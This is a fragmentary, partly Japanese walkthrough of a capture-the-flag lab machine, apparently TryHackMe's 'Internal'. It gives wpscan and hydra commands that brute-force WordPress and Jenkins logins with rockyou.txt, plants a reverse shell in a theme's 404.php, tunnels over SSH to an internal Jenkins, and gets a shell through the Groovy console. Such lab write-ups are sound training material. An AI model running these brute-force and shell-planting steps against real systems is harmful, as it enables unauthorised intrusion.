wpscan --url <http://internal.thm/blog> -e
admin
が見つかるwpscan --url <http://internal.thm/blog> -U admin -P /usr/share/wordlists/rockyou.txt
Appearance
から 404.php
を編集してリバースシェルを入れる(WordPress: Reverse Shell)http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
にアクセス/opt
にパスワードがあるらしい(は?)su aubreanna
で権限昇格aubreanna@internal:~$ cat jenkins.txt cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080
ssh -L 1234:172.17.0.2:8080 [email protected]
http://127.0.0.1:8080
で jenkins にアクセスできるhydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt
nc
Abusing Jenkins Groovy Script Console to get Shell